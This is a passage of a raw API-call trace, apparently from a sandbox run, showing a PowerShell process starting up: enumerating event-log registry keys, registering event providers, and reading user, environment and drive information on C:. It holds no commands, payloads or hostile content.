lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x350) returned 0x0 [0136.184] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.184] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x374) returned 0x0 [0136.184] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.184] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x378) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x37c) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x380) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x384) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x5 [0136.193] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x388) returned 0x0 [0136.193] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.194] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x38c) returned 0x0 [0136.194] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x390) returned 0x0 [0136.194] RegCloseKey (hKey=0x390) returned 0x0 [0136.194] RegCloseKey (hKey=0x370) returned 0x0 [0136.194] RegCloseKey (hKey=0x38c) returned 0x0 [0136.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x38c) returned 0x0 [0136.199] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd14c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd148*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x370) returned 0x0 [0136.201] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x390) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x394) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x398) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x39c) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3a0) returned 0x0 [0136.203] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.203] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x5 [0136.204] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3a4) returned 0x0 [0136.205] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.205] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3a8) returned 0x0 [0136.205] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3ac) returned 0x0 [0136.205] RegCloseKey (hKey=0x3ac) returned 0x0 [0136.205] RegCloseKey (hKey=0x38c) returned 0x0 [0136.205] RegCloseKey (hKey=0x3a8) returned 0x0 [0136.213] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008 [0136.217] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x365e390*="WSMan", lpRawData=0x365e100) returned 1 [0136.222] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.222] CoTaskMemFree (pv=0x10c990) [0136.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.223] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.223] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.224] CoTaskMemFree (pv=0x1b825410) [0136.224] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.224] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.224] CoTaskMemFree (pv=0x14d180) [0136.224] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36638a8*="Alias", lpRawData=0x3663638) returned 1 [0136.225] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.225] CoTaskMemFree (pv=0x10c990) [0136.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.227] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.227] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.228] CoTaskMemFree (pv=0x1b825410) [0136.228] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.228] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.228] CoTaskMemFree (pv=0x14d180) [0136.228] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3668e80*="Environment", lpRawData=0x3668c10) returned 1 [0136.229] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.230] CoTaskMemFree (pv=0x10c990) [0136.230] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.230] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0136.230] CoTaskMemFree (pv=0x10c990) [0136.230] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.230] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="\\Users\\aDU0VK IWA5kLS") returned 0x15 [0136.230] CoTaskMemFree (pv=0x10c990) [0136.231] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.231] SetErrorMode (uMode=0x1) returned 0x1 [0136.231] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd280 | out: lpFileInformation=0xcd280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.231] SetErrorMode (uMode=0x1) returned 0x1 [0136.233] GetLogicalDrives () returned 0x4 [0136.235] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.236] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.236] SetErrorMode (uMode=0x1) returned 0x1 [0136.237] CoTaskMemAlloc (cb=0x68) returned 0x1b80aac0 [0136.237] CoTaskMemAlloc (cb=0x68) returned 0x1b80ab30 [0136.237] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b80aac0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd250, lpMaximumComponentLength=0xcd24c, lpFileSystemFlags=0xcd248, lpFileSystemNameBuffer=0x1b80ab30, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd250*=0xfcdf19fa, lpMaximumComponentLength=0xcd24c*=0xff, lpFileSystemFlags=0xcd248*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0136.237] CoTaskMemFree (pv=0x1b80aac0) [0136.237] CoTaskMemFree (pv=0x1b80ab30) [0136.237] SetErrorMode (uMode=0x1) returned 0x1 [0136.237] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.238] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.238] SetErrorMode (uMode=0x1) returned 0x1 [0136.238] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd1f0 | out: lpFileInformation=0xcd1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.238] SetErrorMode (uMode=0x1) returned 0x1 [0136.239] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.239] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.239] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.241] SetErrorMode (uMode=0x1) returned 0x1 [0136.241] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd0c0 | out: lpFileInformation=0xcd0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.241] SetErrorMode (uMode=0x1) returned 0x1 [0136.241] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.241] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.241] CoTaskMemFree (pv=0x1b825410) [0136.241] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.241] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.242] CoTaskMemFree (pv=0x14d180) [0136.242] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x366ff30*="FileSystem", lpRawData=0x366fcc0) returned 1 [0136.243] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.243] CoTaskMemFree (pv=0x10c990) [0136.243] 